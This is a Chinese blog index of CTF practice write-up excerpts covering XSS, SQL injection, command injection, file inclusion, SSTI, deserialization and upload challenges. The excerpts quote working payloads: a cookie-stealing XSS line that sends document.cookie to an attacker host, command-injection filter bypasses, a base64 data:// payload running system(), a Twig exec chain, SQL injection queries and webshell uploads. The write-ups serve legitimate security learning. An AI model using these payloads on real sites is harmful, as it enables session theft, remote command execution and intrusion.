刷题记录
文章平均质量分 75
刷题记录
huamanggg
生活不止眼前的苟且
展开
-
[红日靶场]ATT&CK实战系列——红队实战(—)
环境搭建靶场地址该靶场给了三台虚拟机下载好分别开启,密码都是hongrisec@2019,登录后需要修改密码,我这里修改的hongri@2019靶场环境是这样的web服务器由win7来搞,网络可以按照官方给的配置但由于我习惯了用自己的windows打,所以我把win7设置成nat,另一个网络设成vm1另外两个虚拟机的网络适配器都设置成vm1NAT的子网是192.168.159.0/24在win7里面的phpstudy打开服务成功访问以上就已经搭建好了环境了WEB服务渗透n原创 2021-10-17 15:34:58 · 885 阅读 · 0 评论 -
[CTFSHOW]反序列化
web257<?phperror_reporting(0);highlight_file(__FILE__);class ctfShowUser{ private $username='xxxxxx'; private $password='xxxxxx'; private $isVip=false; private $class = 'info'; public function __construct(){ $this->c原创 2021-04-27 02:18:37 · 1114 阅读 · 1 评论 -
[BUUCTF]刷题记录7
[BJDCTF2020]Cookie is so stable模板注入——Twig模板好像又是个模板注入输入{{7*'7'}}得到了49,猜测是Twig但是好像命令过滤的很严,看看能不能拿源码hint.php提示:可以发现提交的时候会设置一个cookie,里面的值可以进行模板注入{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}};...原创 2021-04-07 18:55:35 · 278 阅读 · 0 评论 -
对于session.upload_progress漏洞的理解
先放两个文章:https://www.freebuf.com/vuls/202819.htmlhttps://www.cnblogs.com/NPFS/p/13795170.html利用session.upload_progress进行文件包含:信息介绍:session.use_strict_mode默认值为0,此时用户是可以自己定义Session ID的。比如,我们在Cookie里设置PHPSESSID=flag,PHP将会在服务器上创建一个文件:/tmp/sess_flag(还有可能在 /v原创 2021-03-06 15:06:49 · 997 阅读 · 1 评论 -
[BUUCTF]刷题记录6
[WUSTCTF2020]朴实无华目录扫描intval函数的科学记数法绕过MD5加密后与加密前相等直接去扫目录,扫到了fl4g.phpif (isset($_GET['num'])){ $num = $_GET['num']; if(intval($num) < 2020 && intval($num + 1) > 2021){ echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.<原创 2021-04-04 11:36:02 · 455 阅读 · 0 评论 -
[BUUCTF]刷题记录5
[GXYCTF2019]BabyUploadphp后缀会被识别,所以只能传图片加htaccess来解析上传png都失败,jpg是成功的需要修改Content-Type为image/jpeg直接传马,识别到有php标志,换script/upload/893e5ad71a4b97784cc21ff87c648a47/jsphp.jpg由于jpg无法解析,所以传.htaccess开蚁剑拿到flag...原创 2021-04-04 03:28:39 · 554 阅读 · 0 评论 -
[BUUCTF]刷题记录4
[GYCTF2020]Blacklist强网杯有个这种题目,改表名的直接堆叠注入再看表FlagHere的信息1';desc FlagHere#查询记录1';select flag in FlagHere#返回过滤的信息使用HANDLER来绕过过滤,文档完整用法:HANDLER tbl_name OPEN [ [AS] alias]HANDLER tbl_name READ index_name { = | <= | >= | < | > } (valu原创 2021-04-01 19:41:24 · 202 阅读 · 0 评论 -
[BUUCTF]刷题记录3
[护网杯 2018]easy_tornadotornado是python的web框架,虽然还没开始学pythonWeb的开发,就用这个来了解一下看welcome.txt有个renderrender是python中的一个渲染函数,渲染变量到模板中,即可以通过传递不同的参数形成不同的页面再看hints.txt有个md5(cookie_secret+md5(filename))filename已经知道了接下就是要拿到cookie_secretdirmap扫描一下,有发现有内容,由于是框架搭建原创 2021-03-31 20:18:11 · 239 阅读 · 0 评论 -
[BUUCTF]刷题记录2
[GKCTF2020]老八小超市儿搜shopxo的漏洞,知道管理员界面就是admin.php,默认账号密码是admin,shopxo进入后台,在主题安装处发现了文件上传把1.8.0的模板下载下来插入shell找到shell的地址,开蚁剑连接找到flag很遗憾是个假的flag,说真的flag在/root,但是我们没有权限访问看到有个py文件在根目录利用这个文件把root里面的flag提取出来...原创 2021-03-16 21:00:57 · 343 阅读 · 0 评论 -
[BUUCTF]web 刷题记录
[GXYCTF2019]Ping Ping Ping使用;来拼接多条命令输入:?ip=127.0.0.1;ls发现有flag.php?ip=127.0.0.1;cat index.php应该是过滤了空格,可以用$IFS$1绕过读取到index.php,F12看过滤了什么,过滤的很干净注意这里:preg_match("/.*f.*l.*a.*g.*/", $ip)这个的意思是匹配到按flag这个顺序的所有字符所以我们不按顺序就好了:payload:/?ip=127.0.0.1;a=ag原创 2021-02-23 23:59:00 · 592 阅读 · 0 评论 -
攻防世界刷题记录
Web_php_include过滤了php://,后面有include文件包含,这种过滤不是正则过滤,可以通过大小写绕过<?phpshow_source(__FILE__);echo $_GET['hello'];$page=$_GET['page'];while (strstr($page, "php://")) { $page=str_replace("php://", "", $page);}include($page);?>由于不知道flag在哪个文件里面,原创 2021-02-28 23:28:22 · 261 阅读 · 1 评论 -
[CTFSHOW]XSS
xss平台xss平台可以解决很多题https://xsshs.cn/https://xss.pt/web320-326<body/onload=document.location='http://域名或ip/cookie.php?cookie='+document.cookie;>这个代码就够了,执行后去日志看flagweb328有登入和注册框,可以用js代码去获取信息(参考y4)var img = new Image();img.src = "http://your-d原创 2021-02-24 20:56:27 · 293 阅读 · 0 评论 -
[ctf.show]web入门 反序列化
web 254和反序列化没啥关系,就是代码审计payload:?username=xxxxxx&password=xxxxxxweb 255账号密码的赋值和上面一样,就是多了一个cookie['user'],用burp抓包解决highlight_file(__FILE__);include('flag.php');class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; p原创 2021-02-20 23:45:02 · 500 阅读 · 0 评论 -
[CTFSHOW]文件上传
web 151看源码是js判断文件类型进行拦截,先上传一个图片,再抓包改成php文件后缀就可以了,当然内容也删掉,留下php代码web 152和上题一样的解法web 153和上面一样的解法直接改后缀就没用了测试了一下,发现是黑名单的过滤所以就上传.htaccess文件把png文件解析成php但是很遗憾,用不了引用一波羽大佬的wp:本题考点为.user.ini,详细配置可以参考官方文档如果你目录下有user.ini会先去识别里面的配置,但是只有 PHP_INI_PERDIR 和原创 2021-03-28 17:40:59 · 270 阅读 · 0 评论 -
[CTFSHOW]PHP特性
web 89include("flag.php");highlight_file(__FILE__);if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; }}利用数组绕过:/?num[]=0web 90include原创 2021-03-19 01:11:50 · 1768 阅读 · 2 评论 -
[CTFSHOW]文件包含78-88
web 78php伪协议payload:file=php://filter/read=convert.base64-encode/resource=flag.phpweb 79data协议,用base64编码绕过过滤payload:file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==原创 2021-03-07 00:23:59 · 539 阅读 · 0 评论 -
[CTFSHOW]命令执行55-74
web 55if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){ system($c); }}else{ highlight_file(__FILE__);}bin目录:bin为binary的简写主要放置一些 系统的必备执行档例如:cat、cp、chmod df、dmesg、gzip、kill、ls、原创 2021-03-05 01:25:18 · 1594 阅读 · 1 评论 -
[ctf.show]命令执行29-54
web 29代码审计error_reporting(0);if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__);}涉及到一个函数preg_match():这个preg_match 函数用于执行一个正则表达式匹配。看这次的判断是不能出现flag字样,后面的i意思原创 2021-03-01 23:11:12 · 2416 阅读 · 2 评论 -
[ctfshow] web入门 21-28 爆破
burp有一个功能叫做custom iterator(自定义迭代器)具体用法可以参考这个原创 2021-02-06 22:47:15 · 812 阅读 · 1 评论 -
[ctfshow]web入门1-20
web2view-source:是一种协议,像http一样的协议,可以强制查看源代码web3直接在header里找到web4查询robots.txt文件web5涉及到了phps这个东西:phps文件就是php的源代码文件,通常用于提供给用户(访问者)查看php代码,因为用户无法直接通过Web浏览器看到php文件的内容,所以需要用phps文件代替直接访问index.phps,浏览器会自动下载一个phps文件web6考察代码泄露。直接访问url/www.zip,浏览器会自动下载z原创 2021-02-03 22:49:08 · 258 阅读 · 0 评论 -
[BugKu]刷题记录
web 16使用dirmap扫描到index.php.bakinclude_once "flag.php";ini_set("display_errors", 0);$str = strstr($_SERVER['REQUEST_URI'], '?');$str = substr($str,1);$str = str_replace('key','',$str);parse_str($str);echo md5($key1);echo md5($key2);if(md5($key1)原创 2021-03-28 17:40:41 · 226 阅读 · 0 评论 -
XSS学习
XSS叫跨站脚本攻击类型反射型一般需要自行去触发,一般来说是在GET和POST方法里面插入一段xss代码,需要用户直接去访问存储型一般是无意的触发,存储在数据库随机调取的less1当给name=1的时候,看源代码里面可以直接插入scriptpayload:/level1.php?name=<script>alert(123)</scrtip>less2传的值在value里面使用">把标签给闭合,payload:"><scrip原创 2021-02-24 16:34:50 · 121 阅读 · 0 评论 -
ctf.show_web5
<?php $flag=""; $v1=$_GET['v1']; $v2=$_GET['v2']; if(isset($v1) && isset($v2)){ if(!ctype_alpha($v1)){ die("v1 error"); } if(!is_numeric($v2)){ d原创 2021-02-02 23:01:54 · 313 阅读 · 0 评论 -
ctf.show_web2
万能密码回显成功查询字段数没有回显那就联合查询union select,从1试到1,2,3发现三个字段,而且回显位置是第二个所以开始查询表名1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#出现了flag字段,开始查询flag表的字段名1' union select 1,group_concat(column_name),3 f原创 2021-02-02 00:31:02 · 792 阅读 · 0 评论 -
sql注入时带引号屏蔽的怎么处理
写了学长给的一个题目,第一关就是一个sql注入,但是尝试了万能密码是不管用的,因为题目把单引号给过滤掉了,无法使用单引号来闭合$sql = "SELECT username, password FROM user WHERE username='" .$user ."' && password='" .$pass ."'";要想闭合sql语句加上or 1=1#来使判断条件为真,我学到了一个操作:使用\转义用\转义后面的单引号在用户名框输入\,密码框输入or 1=1 #,这样提交后,原创 2021-02-09 20:40:23 · 5216 阅读 · 0 评论